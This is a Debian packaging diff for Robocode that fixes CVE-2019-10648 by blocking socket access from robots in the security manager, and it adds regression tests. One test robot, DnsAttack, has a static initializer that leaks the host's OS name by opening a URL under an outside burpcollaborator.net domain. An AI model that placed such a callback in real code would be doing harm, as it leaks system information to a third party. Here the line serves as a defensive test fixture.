Markus Koschany · Markus Koschany · 466142c3 · 466142c3 · 466142c3
--- a/debian/changelog
+++ b/debian/changelog
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+  * Fix CVE-2019-10648:
+    Robocode allows remote attackers to cause external service interaction
+    (DNS), as demonstrated by a query for a unique subdomain name within an
+    attacker-controlled DNS zone, because of a .openStream call within
+    java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <apo@debian.org>  Mon, 08 Apr 2019 00:13:19 +0200
+
 robocode (1.9.3.3-1) unstable; urgency=medium

  * New upstream version 1.9.3.3.

--- a/debian/patches/CVE-2019-10648.patch
+++ b/debian/patches/CVE-2019-10648.patch
+From: Markus Koschany <apo@debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java     | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java     | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java     | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java    | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java     | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+ 
+import java.net.SocketPermission;
+ import java.security.AccessControlException;
+import java.security.Permission;
+ 
+ 
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 		}
+ 
+ 		Thread c = Thread.currentThread();
+-
+ 		if (isSafeThread(c)) {
+ 			return;
+ 		}
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			if (robotProxy != null) {
+ 				robotProxy.punishSecurityViolation(message);
+ 			}
+-			throw new AccessControlException(message);
+			throw new SecurityException(message);
+ 		}
+ 	}
+ 
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			return;
+ 		}
+ 		Thread c = Thread.currentThread();
+-
+ 		if (isSafeThread(c)) {
+ 			return;
+ 		}
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
+ 			String message = "Robots are only allowed to create up to 5 threads!";
+ 
+ 			robotProxy.punishSecurityViolation(message);
+-			throw new AccessControlException(message);
+			throw new SecurityException(message);
+ 		}
+ 	}
+	
+    public void checkPermission(Permission perm) {
+		if (RobocodeProperties.isSecurityOff()) {
+			return;
+		}
+		Thread c = Thread.currentThread();
+		if (isSafeThread(c)) {
+			return;
+		}
+        super.checkPermission(perm);
+
+        if (perm instanceof SocketPermission) {
+    		IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
+        	String message = "Using socket is not allowed";
+        	robotProxy.punishSecurityViolation(message);
+            throw new SecurityException(message);
+        }
+    }
+ 
+ 	private boolean isSafeThread(Thread c) {
+ 		return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
+++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
+package tested.robots;
+
+public class DnsAttack extends robocode.Robot {
+	static {
+		try {
+			new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
+					+ ".randomsubdomain.burpcollaborator.net").openStream();
+		} catch (Exception e) {
+		}
+	}
+
+	public void run() {
+		for (;;) {
+			ahead(100);
+			back(100);
+		}
+	}
+}
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 
+ 	private boolean messagedInitialization;
+-	private boolean messagedAccessDenied;
+	private boolean securityExceptionOccurred;
+ 	
+ 	@Override
+ 	public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ 			messagedInitialization = true;	
+ 		}	
+ 
+-		if (out.contains("access denied (java.net.SocketPermission")
+-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
+-			messagedAccessDenied = true;	
+		if (out.contains("java.lang.SecurityException:")) {
+			securityExceptionOccurred = true;	
+ 		}	
+ 	}
+ 
+ 	@Override
+ 	protected void runTeardown() {
+ 		Assert.assertTrue("Error during initialization", messagedInitialization);
+-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ 	}
+ 
+ 	@Override
+ 	protected int getExpectedErrors() {
+-		return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
+		return 2;
+ 	}
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+  */
+ public class TestHttpAttack extends RobocodeTestBed {
+ 
+-	private boolean messagedAccessDenied;
+	private boolean securityExceptionOccurred;
+ 	
+ 	@Override
+ 	public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+ 
+ 		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+ 
+-		if (out.contains("access denied (java.net.SocketPermission")
+-				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
+-			messagedAccessDenied = true;	
+		if (out.contains("java.lang.SecurityException:")) {
+			securityExceptionOccurred = true;	
+ 		}	
+ 	}
+ 
+ 	@Override
+ 	protected void runTeardown() {
+-		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ 	}
+ 
+ 	@Override
+ 	protected int getExpectedErrors() {
+-		return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
+		return 1;
+ 	}
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
+++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
+/**
+ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
+ * All rights reserved. This program and the accompanying materials
+ * are made available under the terms of the Eclipse Public License v1.0
+ * which accompanies this distribution, and is available at
+ * https://robocode.sourceforge.io/license/epl-v10.html
+ */
+package net.sf.robocode.test.robots;
+
+import net.sf.robocode.test.helpers.RobocodeTestBed;
+import org.junit.Assert;
+import robocode.control.events.TurnEndedEvent;
+
+/**
+ * @author Flemming N. Larsen (original)
+ */
+public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
+
+	private boolean securityExceptionOccurred;
+	
+	@Override
+	public String getRobotNames() {
+		return "tested.robots.DnsAttack,sample.Target";
+	}
+
+	@Override
+	public void onTurnEnded(TurnEndedEvent event) {
+		super.onTurnEnded(event);
+
+		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+
+		if (out.contains("SYSTEM: Using socket is not allowed")) {
+			securityExceptionOccurred = true;	
+		}	
+	}
+
+	@Override
+	protected void runTeardown() {
+		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+	}
+
+	@Override
+	protected int getExpectedErrors() {
+		return 1;
+	}
+}
--- a/debian/patches/series
+++ b/debian/patches/series
 showJavaDocumentation.patch
 maven-assembly.patch
 ecj.patch
+CVE-2019-10648.patch